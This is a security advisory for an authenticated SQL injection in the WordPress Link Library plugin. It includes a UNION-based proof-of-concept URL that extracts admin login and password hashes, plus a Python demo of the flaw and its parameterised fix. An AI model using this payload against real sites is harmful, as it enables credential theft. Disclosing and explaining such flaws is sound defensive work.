Homepage:
https://wordpress.org/plugins/link-library/
Description:
Required access: the vulnerable code path is reachable only by a logged-in administrator (it sits behind the plugin's admin menu page), so this is an authenticated, admin-only issue.
$_GET['linkid'] is concatenated into the link query without escaping, integer casting or $wpdb->prepare(), which allows SQL injection.
File / Code:
Path: /wp-content/plugins/link-library/link-library-admin.php
Line: 686
if ( isset( $_GET['genthumbsingle'] ) || isset( $_GET['genfaviconsingle'] ) ) {
    // $_GET['linkid'] is appended verbatim: no absint() cast, no $wpdb->prepare()
    $linkquery .= " AND l.link_id = " . $_GET['linkid'];
}
$linkitems = $wpdb->get_results( $linkquery );
Proof of Concept
1 – Log in as an administrator.
2 – Request the attack URL (UNION-based injection; the 26 selected values match the column count of the plugin's link query, and the 16th slot carries user_login:user_pass from wp_users):
http://localhost:8080/wp-admin/admin.php?page=link-library&genthumbsingle=1&linkid=1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,CONCAT(user_login,char(58),user_pass),17,18,19,20,21,22,23,24,25,26+FROM+wp_users+WHERE+ID=1
3 – Result:
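The following script is an added example, not part of the original advisory or of the plugin's code. It recreates the vulnerable pattern from link-library-admin.php and the PoC payload in Python against an in-memory SQLite database, then shows the hardened form: cast the id to an integer and bind it as a query parameter, which is what absint() combined with $wpdb->prepare( '... = %d', ... ) achieves in WordPress. The payload is adapted to SQLite syntax (a || char(58) || b in place of MySQL's CONCAT). The table layout, the sample link row, the login and the hash are all constructed; the stand-in wp_links table simply has 26 columns so the advisory's 26-value UNION lines up.

```python
import re
import sqlite3

# Constructed stand-in schema (not the plugin's real table layout): wp_links with
# 26 columns so the advisory's 26-value UNION payload lines up, and wp_users
# holding a placeholder login/hash pair.
LINK_COLUMN_COUNT = 26
FAKE_LOGIN = "admin"
FAKE_HASH = "$P$BconstructedPlaceholderHash"  # constructed, not a real phpass hash


def build_sample_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    extra = ", ".join(f"col{i} TEXT DEFAULT ''" for i in range(2, LINK_COLUMN_COUNT + 1))
    conn.execute(f"CREATE TABLE wp_links (link_id INTEGER PRIMARY KEY, {extra})")
    conn.execute("CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT)")
    conn.execute("INSERT INTO wp_links (link_id, col2) VALUES (1, 'https://example.invalid/')")
    conn.execute("INSERT INTO wp_users VALUES (1, ?, ?)", (FAKE_LOGIN, FAKE_HASH))
    conn.commit()
    return conn


def vulnerable_query(linkid: str) -> str:
    """Same pattern as the plugin: the raw GET value is glued into the SQL string."""
    return "SELECT * FROM wp_links l WHERE 1=1 AND l.link_id = " + linkid


def run_vulnerable(conn: sqlite3.Connection, linkid: str) -> list:
    return conn.execute(vulnerable_query(linkid)).fetchall()


# The advisory's payload, adapted to SQLite: MySQL's CONCAT(a, char(58), b)
# becomes a || char(58) || b. Slot 16 carries user_login:user_pass.
UNION_PAYLOAD = (
    "1 UNION SELECT "
    + ",".join(str(i) for i in range(1, 16))
    + ",user_login || char(58) || user_pass,"
    + ",".join(str(i) for i in range(17, LINK_COLUMN_COUNT + 1))
    + " FROM wp_users WHERE ID=1"
)


def extract_leaked_credentials(rows: list) -> list:
    """Return every login:hash string that surfaced in column 16 (index 15)."""
    return [row[15] for row in rows if isinstance(row[15], str) and ":" in row[15]]


def coerce_link_id(value: str) -> int:
    """Mimic WordPress absint(): keep a leading integer, drop the rest, 0 if none."""
    match = re.match(r"\s*[+-]?\d+", value)
    return abs(int(match.group())) if match else 0


def run_hardened(conn: sqlite3.Connection, linkid: str) -> list:
    """Hardened form: cast to int and bind as a parameter. In WordPress this is
    absint( $_GET['linkid'] ) passed through $wpdb->prepare( '... = %d', ... )."""
    sql = "SELECT * FROM wp_links l WHERE 1=1 AND l.link_id = ?"
    return conn.execute(sql, (coerce_link_id(linkid),)).fetchall()


if __name__ == "__main__":
    db = build_sample_db()
    print("vulnerable:", extract_leaked_credentials(run_vulnerable(db, UNION_PAYLOAD)))
    print("hardened:  ", extract_leaked_credentials(run_hardened(db, UNION_PAYLOAD)))
```

Against the vulnerable query the payload returns the genuine link row plus a second row whose 16th column is admin:$P$..., i.e. the credential pair from wp_users; against the hardened query the same input collapses to link_id = 1 and only the genuine row comes back. Note that the column count in the UNION has to match the SELECT exactly, which is why the original PoC enumerates 26 values.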
Timeline:
- 14/08/2017 – Discovered
- 14/08/2017 – Vendor notified
- 14/08/2017 – Fixed in version 1.2.1